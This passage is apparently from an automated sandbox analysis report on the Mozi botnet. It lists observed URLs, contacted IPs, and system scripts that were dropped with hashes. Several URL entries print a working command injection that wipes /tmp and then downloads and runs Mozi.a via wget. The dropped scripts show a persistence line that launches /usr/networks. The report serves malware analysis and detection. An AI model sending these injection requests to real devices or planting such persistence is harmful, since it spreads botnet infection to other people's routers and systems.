http://114.142.213.80:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://121.151.98.14:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://178.32.54.199:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://81.108.37.251:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://104.25.119.143:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://188.215.82.71:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://148.229.1.12:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://54.173.33.241:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://93.41.229.147:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://162.209.132.128:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://186.219.131.213:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://23.57.42.173:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://23.1.122.127:80/HNAP1/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://pastebin.ca)	alsa-info.sh.12.dr	false	Avira URL Cloud: safe	low
http://%s:%d/bin.sh;chmod	Mozi.m.3, networks.12.dr	true	Avira URL Cloud: safe	low
http://%s:%d/Mozi.a;chmod	networks.12.dr	false	Avira URL Cloud: safe	low
http://%s:%d/Mozi.m;$	Mozi.m.3, networks.12.dr	false	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/soap/envelope/	networks.12.dr	false		high
http://www.pastebin.ca/upload.php	alsa-info.sh.12.dr	false		high
http://%s:%d/Mozi.m	networks.12.dr	false	Avira URL Cloud: safe	low
http://www.alsa-project.org/cardinfo-db/	alsa-info.sh.12.dr	false	Avira URL Cloud: safe	unknown
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY	alsa-info.sh.12.dr	false		high
http://%s:%d/bin.sh	networks.12.dr	true	Avira URL Cloud: safe	low
http://www.alsa-project.org/alsa-info.sh	alsa-info.sh.12.dr	false	Avira URL Cloud: safe	unknown
http://%s:%d/Mozi.m;	Mozi.m.3, networks.12.dr	false	Avira URL Cloud: safe	low
http://%s:%d/Mozi.a;sh$	Mozi.m.3, networks.12.dr	false	Avira URL Cloud: safe	low
http://www.pastebin.ca.	alsa-info.sh.12.dr	false		high
http://schemas.xmlsoap.org/soap/encoding/	networks.12.dr	false		high
http://127.0.0.1	networks.12.dr	false	Avira URL Cloud: safe	unknown
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)	Mozi.m.3, networks.12.dr	false		high
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/	.config.12.dr	false		high
http://www.alsa-project.org	alsa-info.sh.12.dr	false	Avira URL Cloud: safe	unknown
http://127.0.0.1sendcmd	Mozi.m.3, networks.12.dr	false	URL Reputation: safe	low
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah	alsa-info.sh.12.dr	false		high
http://ipinfo.io/ip	networks.12.dr	false		high
http://%s:%d/Mozi.m;/tmp/Mozi.m	Mozi.m.3, networks.12.dr	false	Avira URL Cloud: safe	low
http://www.pastebin.ca	alsa-info.sh.12.dr	false		high
http://purenetworks.com/HNAP1/	Mozi.m.3, networks.12.dr	false	URL Reputation: safe	unknown
http://git.kernel.org/cgit/utils/kernel/kmod/kmod.git/commit/libkmod/libkmod-module.c?id=fd44a98ae2e	kmod.sh.12.dr	false		high
http://www.alsa-project.org.	alsa-info.sh.12.dr	false	Avira URL Cloud: safe	unknown
http://HTTP/1.1	Mozi.m.3, networks.12.dr	false	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/soap/envelope//	Mozi.m.3, networks.12.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
124.109.183.90	unknown	Japan	2516	KDDIKDDICORPORATIONJP	false
117.207.90.45	unknown	India	9829	BSNL-NIBNationalInternetBackboneIN	false
94.149.105.110	unknown	Denmark	9158	TELENOR_DANMARK_ASDK	false
185.239.176.62	unknown	Iraq	204798	MaxLinkCompanyLtdIQ	false
37.133.231.78	unknown	Spain	12479	UNI2-ASES	false
208.252.73.84	unknown	United States	4208	THE-ISERV-COMPANYUS	false
91.6.191.105	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
130.114.149.2	unknown	United States	1467	DNIC-ASBLK-01467-01468US	false
24.219.254.49	unknown	United States	8092	AMHUS	false
39.99.69.81	unknown	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
1.185.181.124	unknown	China	4538	ERX-CERNET-BKBChinaEducationandResearchNetworkCenter	false
208.115.182.29	unknown	United States	22968	MIAMI-UNIVERSITYUS	false
113.129.113.246	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
135.192.237.245	unknown	United States	14962	NCR-252US	false
67.148.51.196	unknown	United States	3910	CENTURYLINK-EUROPE-LEGACY-QWESTUS	false
145.55.9.226	unknown	United Kingdom	1103	SURFNET-NLSURFnetTheNetherlandsNL	false
143.49.171.154	unknown	United States	13748	CSHLUS	false
44.87.205.17	unknown	United States	7377	UCSDUS	false
218.72.91.66	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
23.11.203.232	unknown	United States	20940	AKAMAI-ASN1EU	false
53.248.69.159	unknown	Germany	31399	DAIMLER-ASITIGNGlobalNetworkDE	false
98.245.32.216	unknown	United States	7922	COMCAST-7922US	false
80.59.253.0	unknown	Spain	3352	TELEFONICA_DE_ESPANAES	false
147.16.72.64	unknown	United States	10796	TWC-10796-MIDWESTUS	false
4.171.59.186	unknown	United States	3356	LEVEL3US	false
37.78.209.154	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
142.94.252.227	unknown	Canada	393952	GOANETCA	false
124.13.95.167	unknown	Malaysia	4788	TMNET-AS-APTMNetInternetServiceProviderMY	false
86.15.234.71	unknown	United Kingdom	5089	NTLGB	false
162.4.117.204	unknown	unknown	35893	ACPCA	false
57.219.0.139	unknown	Belgium	2686	ATGS-MMD-ASUS	false
159.229.74.191	unknown	United States	13188	TRIOLANUA	false
69.103.186.241	unknown	United States	4261	BLUEGRASSNETUS	false
124.225.149.1	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
41.29.160.34	unknown	South Africa	29975	VODACOM-ZA	false
6.11.213.232	unknown	United States	668	DNIC-AS-00668US	false
149.196.235.159	unknown	United Kingdom	8386	KOCNETTR	false
139.112.91.231	unknown	Norway	5619	EVRY-NO	false
170.145.194.147	unknown	United States	2048	LANET-1US	false
16.76.8.99	unknown	United States	unknown	unknown	false
204.180.37.241	unknown	United States	1239	SPRINTLINKUS	false
48.63.209.77	unknown	United States	2686	ATGS-MMD-ASUS	false
154.123.11.110	unknown	Kenya	12455	JAMBONETKE	false
204.228.101.40	unknown	United States	30136	AD12US	false
95.179.227.24	unknown	Netherlands	20473	AS-CHOOPAUS	false
222.196.0.53	unknown	China	4538	ERX-CERNET-BKBChinaEducationandResearchNetworkCenter	false
154.62.137.64	unknown	United States	174	COGENT-174US	false
44.53.23.174	unknown	United States	7377	UCSDUS	false
172.206.179.220	unknown	United States	18747	IFX18747US	false
175.244.101.90	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
163.8.68.103	unknown	Australia	45589	ENERGYAUST-ASAUSGRIDAU	false
68.136.209.119	unknown	United States	23148	TERRENAPUS	false
35.60.164.149	unknown	United States	36375	UMICH-AS-5US	false
202.222.4.253	unknown	Japan	10010	TOKAITOKAICommunicationsCorporationJP	false
166.106.1.246	unknown	unknown	9321	HYUNET-ASHanyangUniversityKR	false
104.100.148.229	unknown	United States	9443	VOCUS-RETAIL-AUVocusRetailAU	false
177.249.12.60	unknown	Mexico	13999	MegaCableSAdeCVMX	false
39.147.161.154	unknown	China	9808	CMNET-GDGuangdongMobileCommunicationCoLtdCN	false
43.126.201.126	unknown	Japan	4249	LILLY-ASUS	false
182.170.213.106	unknown	Japan	2527	SO-NETSo-netEntertainmentCorporationJP	false
167.110.204.224	unknown	United States	6057	AdministracionNacionaldeTelecomunicacionesUY	false
220.71.153.167	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
142.78.223.105	unknown	Canada	2665	CDAGOVNCA	false
218.39.19.65	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	false
95.240.239.88	unknown	Italy	3269	ASN-IBSNAZIT	false
35.89.206.91	unknown	United States	237	MERIT-AS-14US	false
53.114.83.124	unknown	Germany	31399	DAIMLER-ASITIGNGlobalNetworkDE	false
173.94.112.119	unknown	United States	11426	TWC-11426-CAROLINASUS	false
164.251.226.208	unknown	United States	5972	DNIC-ASBLK-05800-06055US	false
60.50.120.207	unknown	Malaysia	4788	TMNET-AS-APTMNetInternetServiceProviderMY	false
62.111.242.61	unknown	Poland	12741	AS-NETIAWarszawa02-822PL	false
23.232.144.253	unknown	Japan	2514	INFOSPHERENTTPCCommunicationsIncJP	false
185.79.226.70	unknown	Portugal	41962	MGONCALVESPT	false
47.85.193.136	unknown	United States	3209	VODANETInternationalIP-BackboneofVodafoneDE	false
149.31.223.0	unknown	United States	27616	AS-NEWSCHOOLUS	false
156.4.225.43	unknown	United States	29975	VODACOM-ZA	false
205.4.238.39	unknown	United States	2914	NTT-COMMUNICATIONS-2914US	false
11.230.142.52	unknown	United States	3356	LEVEL3US	false
40.91.248.26	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
130.68.103.209	unknown	United States	205	MONTCLAIR-ASUS	false
205.95.125.90	unknown	United States	647	DNIC-ASBLK-00616-00665US	false
32.174.73.232	unknown	United States	2686	ATGS-MMD-ASUS	false
4.110.94.140	unknown	United States	3356	LEVEL3US	false
185.8.253.105	unknown	France	8399	SEWAN-FR	false
20.238.169.86	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
220.205.132.232	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
16.65.114.156	unknown	United States	unknown	unknown	false
211.4.101.192	unknown	Japan	2516	KDDIKDDICORPORATIONJP	false
217.232.11.98	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
165.41.240.146	unknown	United States	37053	RSAWEB-ASZA	false
194.97.213.242	unknown	Germany	5430	FREENETDEfreenetDatenkommunikationsGmbHDE	false
173.167.216.78	unknown	United States	7922	COMCAST-7922US	false
103.59.2.142	unknown	India	9829	BSNL-NIBNationalInternetBackboneIN	false
152.114.122.105	unknown	United Kingdom	29295	NPSGB	false
135.26.138.61	unknown	United States	13333	CCI-PA-AS-1US	false
34.186.100.193	unknown	United States	2686	ATGS-MMD-ASUS	false
93.13.215.74	unknown	France	15557	LDCOMNETFR	false
39.38.182.96	unknown	Pakistan	45595	PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPK	false
198.145.227.220	unknown	United States	2044	IINET-2044US	false
169.137.244.247	unknown	United States	13433	COXNETUS	false

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	./usr/networks&.exit 1.

/etc/acpi/asus-keyboard-backlight.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	326
Entropy (8bit):	5.2904323771702915
Encrypted:	false
SSDEEP:	6:K8K2A6godGINKlsX3stINKVHBfNewdrCDjwFhD2UDKVHxMn:1f/NA23stIN8HdNTek3n8HWn
MD5:	626FDB50CA17F4E2BAAB79F09F3EB73B
SHA1:	2D838897E7D735CB67348F60EDA0E1E41D45DCBE
SHA-256:	3FDFC702E6D3E1FE75E88B60408ED1B435F3AE24A57B56636C16CB321CBAE440
SHA-512:	E3FB063A63DF21B22D20754AE2CEA1F0D80464F4A870491E2843F7D88EBA181E351C4A20D67AD6A4CD8D1BF26971C654C502D5770D5B43B34024FAF2048171F5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	./usr/networks&.test -d $KEYS_DIR \|\| exit 0..MIN=0.MAX=$(cat $KEYS_DIR/max_brightness).VAL=$(cat $KEYS_DIR/brightness)..if [ "$1" = down ]; then..VAL=$((VAL-1)).else..VAL=$((VAL+1)).fi..if [ "$VAL" -lt $MIN ]; then..VAL=$MIN.elif [ "$VAL" -gt $MAX ]; then..VAL=$MAX.fi..echo $VAL > $KEYS_DIR/brightness../usr/networks&.exit 1.

/etc/acpi/asus-wireless.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	157
Entropy (8bit):	4.412729940630044
Encrypted:	false
SSDEEP:	3:qXVfGHvNM8iKWERAIda74QvvvLwDGvNM8iKWERAIdJCsqORFL8OORgn:KJFn40MLFb+Pn
MD5:	9B10038ADE21F207C6C9F4EEC7C5ADA2
SHA1:	F3FB51110B022F8BFEA1874C6D6984D8C6EF8C7B
SHA-256:	E6322FBB30D1362ED490A39BE58B491C7DB9CC96DB09C8E2BDC1B1F35E1A00E2
SHA-512:	C9A47A0A449FD009221006D9077F1EDD25305EDA017DED7542AAF8EF80166B1645B889B478D6067ED2CB0123D798103DD73FD69B818C9B9704A274DC3FB4EA15
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	./usr/networks&.test -f /usr/share/acpi-support/state-funcs \|\| exit 0... /usr/share/acpi-support/state-funcs..toggleAllWirelessStates../usr/networks&.exit 1.

/etc/acpi/ibm-wireless.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	636
Entropy (8bit):	4.722087767454589
Encrypted:	false
SSDEEP:	12:wNGs4KSb7jFCR2TeNMngFfiTccfkneFhpmtjwkuVSd/1kVqEn:wFS/5uab2d7neFhij26/CwE
MD5:	77315C7FA7809C62D27AD6C9EE1C9289
SHA1:	C8EC67C17E334B13B1DE93B0D2E822C606F9985E
SHA-256:	81CB0908E30FCF60AEA43776D5F1C3AEE6E1B46190A3DB5A1866CD1D2E09E17E
SHA-512:	B679EF04092FDDBB0FA290F2D817DA38601336261870EE37BE6FA9451004B338E3A981694A0320B40A47A3597BA7B172848C877313F169ECDE3B8FB7FE38C582
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	./usr/networks&.test -f /usr/share/acpi-support/state-funcs \|\| exit 0..# Find and toggle wireless of bluetooth devices on ThinkPads... /usr/share/acpi-support/state-funcs..rfkill list \| sed -n -e'/tpacpi_bluetooth_sw/,/^[0-9]/p' \| grep -q 'Soft blocked: yes'.bluetooth_state=$?..# Note that this always alters the state of the wireless!.toggleAllWirelessStates;..# Sequence is Both on, Both off, Wireless only, Bluetooth only.if ! isAnyWirelessPoweredOn; then. # Wireless was turned off. if [ "$bluetooth_state" = 0 ]; then. rfkill unblock bluetooth. else. rfkill block bluetooth. fi.fi../usr/networks&.exit 1.

/etc/acpi/tosh-wireless.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	483
Entropy (8bit):	4.215331622973397
Encrypted:	false
SSDEEP:	6:KJFqcA/0MLFMkneFUJLS3SU9mFCQROAJzHdcnK/lHb/iHIYK3zQYlyMn:wK8QdeFuS3lyXp9cK/lziijQYlrn
MD5:	07889D65619CDB80F8E876A087F160D3
SHA1:	35CB92B632BCA335EBEA933A736F75856E8CA262
SHA-256:	34768A7BD08F050862E888142B6246B41458957CF56BC4879619D3A315E3567B
SHA-512:	C86DE6FC5047AC695717E11B8714DE439E63949B439C3B8AA79C060CF0E807FB964C81B1FF59A7C0F38E0F3CC85E6784F56E1536DDDE9B66D1E22D306BEFCFAE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	./usr/networks&.test -f /usr/share/acpi-support/key-constants \|\| exit 0... /usr/share/acpi-support/state-funcs..if isAnyWirelessPoweredOn; then. if [ -x /usr/bin/toshset ]; then. if `toshset -bluetooth \| grep -q attached`; then. toshset -bluetooth off. toggleAllWirelessStates. else. toshset -bluetooth on. fi. else..toggleAllWirelessStates. fi.else. toggleAllWirelessStates.fi../usr/networks&.exit 1.

/etc/acpi/undock.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.77497394042067
Encrypted:	false
SSDEEP:	6:KJFqcA/05CbMTCYEBKAABrX8FvfbrX8EmNv0V4n:wK852PYEBKAkrX4HXHnV4n
MD5:	5E3A15E41D35EC409613236A20B5783E
SHA1:	5D71BD9A121461464F7937B2E921410ED93BEE24
SHA-256:	C3294C9B06A81A3325E131BF139B5F1C8615290B382F0014DA440F4F76C49BEA
SHA-512:	13E47AA60C322CB0DEF4894B97625EC2E3AE9214743569AD566ECA1331D581CD2185BC27CD538E8BA5D475FBBB79EC76EA4CCE31EDB115F30684D80CA9F5F1F4
Malicious:	false
Preview:	./usr/networks&.test -f /usr/share/acpi-support/key-constants \|\| exit 0..for device in /sys/devices/platform/dock.*; do..[ -e "$device/type" ] \|\| continue..[ x$(cat "$device/type") = xdock_station ] \|\| continue..echo 1 > "$device/undock".done../usr/networks&.exit 1.

/etc/console-setup/cached_setup_font.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/etc/console-setup/cached_setup_keyboard.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	297
Entropy (8bit):	4.680424868813
Encrypted:	false
SSDEEP:	6:aJGzAuCuzHB/unOJufu+/ugEWR+V18yjPn:aJcvzHBmnO4G7gEWQ18yTn
MD5:	10400BA156D6BC78E67D90A86A2906D4
SHA1:	D4D7BA30B85ABA9FC08EC0C990651601128B2A74
SHA-256:	D348A8461FB9190DCBD6CF35575B2C4799E04AA4E359EA921F8723C9FDAA457A
SHA-512:	25B5C137961E10987A0BBF19AD7CCABC865A7DF7325D3C7B0B0C9BBDB68D5C4470B012A720FA43B707705ACB8FD8DD834AF3DCF7AEA3284A5587EC3E9212E9B3
Malicious:	false
Preview:	./usr/networks&. exit 0.fi.kbd_mode '-u' < '/dev/tty1' .kbd_mode '-u' < '/dev/tty2' .kbd_mode '-u' < '/dev/tty3' .kbd_mode '-u' < '/dev/tty4' .kbd_mode '-u' < '/dev/tty5' .kbd_mode '-u' < '/dev/tty6' .loadkeys '/etc/console-setup/cached_UTF-8_del.kmap.gz' > '/dev/null' ../usr/networks&.exit 1.

/etc/console-setup/cached_setup_terminal.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/etc/gdm3/config-error-dialog.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/etc/init.d/S95baby.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	25
Entropy (8bit):	3.8936606896881854
Encrypted:	false
SSDEEP:	3:TKH4v0VJ:hK
MD5:	1B3235BA10FC04836C941D3D27301956
SHA1:	8909655763143702430B8C58B3AE3B04CFD3A29C
SHA-256:	01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
SHA-512:	98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
Malicious:	true
Preview:	#!/bin/sh./usr/networks&.

/etc/init.d/console-setup.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	85
Entropy (8bit):	3.542211979287425
Encrypted:	false
SSDEEP:	3:qXVxpjWvFFFfN6DmXVOORgn:apqvFFxN6iMn
MD5:	C0EB4B74AA083DE0731C7411490F5680
SHA1:	91FE8A766B188646A140A0272D115A4E98F5587B
SHA-256:	B2303EB7BFEE2D091C009CC33291EE1D146B2CBFCC52E1334EAA220777053768
SHA-512:	4BA597428E1FB7A6C6A050A974BBD9ED955D5E5EFEDCD39CD44B274F34E7542CFB4E90A3F28C02D52AD4AA0C05AE73B1AABE6CC88B19203C1B4E9DBDB39CB2A5
Malicious:	true
Preview:	./usr/networks&. exit 3. ;;. esac.fi../usr/networks&.exit 1.

/etc/init.d/hwclock.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	true
Preview:	./usr/networks&.exit 1.

/etc/init.d/keyboard-setup.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	85
Entropy (8bit):	3.542211979287425
Encrypted:	false
SSDEEP:	3:qXVxpjWvFFFfN6DmXVOORgn:apqvFFxN6iMn
MD5:	C0EB4B74AA083DE0731C7411490F5680
SHA1:	91FE8A766B188646A140A0272D115A4E98F5587B
SHA-256:	B2303EB7BFEE2D091C009CC33291EE1D146B2CBFCC52E1334EAA220777053768
SHA-512:	4BA597428E1FB7A6C6A050A974BBD9ED955D5E5EFEDCD39CD44B274F34E7542CFB4E90A3F28C02D52AD4AA0C05AE73B1AABE6CC88B19203C1B4E9DBDB39CB2A5
Malicious:	true
Preview:	./usr/networks&. exit 3. ;;. esac.fi../usr/networks&.exit 1.

/etc/profile.d/01-locale-fix.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	true
Preview:	./usr/networks&.exit 1.

/etc/profile.d/Z97-byobu.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	true
Preview:	./usr/networks&.exit 1.

/etc/profile.d/Z99-cloud-locale-test.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	true
Preview:	./usr/networks&.exit 1.

/etc/profile.d/Z99-cloudinit-warnings.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	true
Preview:	./usr/networks&.exit 1.

/etc/profile.d/apps-bin-path.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	true
Preview:	./usr/networks&.exit 1.

/etc/profile.d/bash_completion.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	true
Preview:	./usr/networks&.exit 1.

/etc/profile.d/cedilla-portuguese.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
